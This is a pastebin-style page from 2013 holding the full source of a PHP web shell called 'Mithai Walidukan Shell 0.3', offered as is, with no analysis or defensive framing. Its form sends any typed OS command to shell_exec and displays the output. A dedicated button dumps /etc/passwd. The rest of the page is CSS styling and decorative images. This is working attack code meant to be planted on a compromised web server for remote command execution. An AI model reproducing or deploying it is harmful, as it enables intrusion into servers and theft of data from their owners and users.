Mithai Walidukan Shell 0.3


SUBMITTED BY: Guest

DATE: Nov. 26, 2013, 10:04 a.m.

FORMAT: PHP

SIZE: 3.7 kB

HITS: 3482

  1. <body bgcolor="black">
  2. <div class="pic1"> </div>
  3. <div class="aaa">
  4. <div class = "pic3" >
  5. <div class = "pic3" >
  6. <div class = "pic3" >
  7. <div class = "pic3" > </div>
  8. </div>
  9. </div>
  10. </div>
  11. </div>
  12. <center>
  13. <div class="pic2"> </div>
  14. <br>
  15. <form method="post" >
  16. Commands <input type="text" name="txt1" placeholder="Put Any OS Command" class="text1"><br>
  17. <input type="submit" value="Click" class="b" name="submit">
  18. <input type="submit" class="b2all" value="Get etc/password" name="etcpasswd">
  19. </form>
  20. <?php
  21. if(isset($_POST['submit']))
  22. {
  23. $a=$_POST['txt1'];
  24. $output = shell_exec("$a");
  25. echo "<textarea > $output </textarea>";
  26. }
  27. ?>
  28. <?php
  29. function etcpasswd()
  30. {
  31. $output = shell_exec("cat /etc/passwd");
  32. echo "<textarea > $output </textarea>";
  33. }
  34. if(isset($_POST['etcpasswd']))
  35. {
  36. etcpasswd();
  37. }
  38. function writemsg1()
  39. {
  40. echo "Hello world! 2";
  41. }
  42. if(isset($_POST['submit1']))
  43. {
  44. writeMsg1();
  45. }
  46. ?>
  47. <br />
  48. <br />
  49. <b> <font color="white"> Proudly Powered By <a href="http://www.mithaiwalidukan.in"> Mithai Wali Dukan </a> </font></b>
  50. </center>
  51. <style>
  52. .text1
  53. {
  54. color:#060;
  55. font-family:Arial, Helvetica, sans-serif;
  56. font-size:20px;
  57. font-weight: bold;
  58. border-radius:4px;
  59. }
  60. textarea
  61. {
  62. color:#060;
  63. height:530px;
  64. width:800px;
  65. border:#003366 medium double ;
  66. border-width:20px;
  67. border-radius:5px;
  68. }
  69. textarea:hover
  70. {
  71. color:#060;
  72. height:530px;
  73. width:800px;
  74. border:#003366 medium double ;
  75. border-width:20px;
  76. box-shadow:0px 0px 40px #006600;
  77. border-radius:5px;
  78. }
  79. .b
  80. {
  81. height:35px;
  82. width:80px;
  83. background-color:green;
  84. display:inline-block;
  85. margin-left:60px;
  86. margin-top:10px;
  87. border-radius:10px;
  88. }
  89. .b:hover
  90. {
  91. height:35px;
  92. width:80px;
  93. background-color:green;
  94. box-shadow:0px 0px 40px #006600;
  95. display:inline-block;
  96. border-radius:10px;
  97. }
  98. .pic3
  99. {
  100. background-image:url(http://s12.postimg.org/unvpx414p/Untitled_4.gif);
  101. height:90;
  102. width:100;
  103. background-size:cover;
  104. transition:width 2s, height 2s, transform 2s;
  105. -webkit-transition:width 2s, height 2s, -webkit-transform 2s;
  106. }
  107. .pic3:hover
  108. {
  109. background-image:url(http://s12.postimg.org/unvpx414p/Untitled_4.gif);
  110. height:90;
  111. width:100;
  112. background-size:cover;
  113. transform:rotate(360deg);
  114. -webkit-transform:rotate(360deg);
  115. }
  116. .pic2
  117. {
  118. background-image:url(http://s10.postimg.org/xpzqhm79h/Unt.gif);
  119. height:112;
  120. width:120;
  121. margin-left:950px;
  122. position:absolute;
  123. background-size:contain;
  124. margin-top:25px;
  125. }
  126. .pic1
  127. {
  128. background-image:url(http://s21.postimg.org/563r7v8g3/supertux.gif);
  129. height:102;
  130. width:120;
  131. margin-left:10px;
  132. position:absolute;
  133. margin-top:1px;
  134. }
  135. a:link {color:red;}
  136. a:visited {color:#060;}
  137. a:hover {color:#060;}
  138. a:active {color:white;}
  139. a{text-decoration: none;}
  140. .aaa
  141. {
  142. margin-left:650px;
  143. }
  144. .b2all
  145. {
  146. background-color:green;
  147. display:inline-block;
  148. border-radius:10px;
  149. }
  150. </style>
  151. </body>

comments powered by Disqus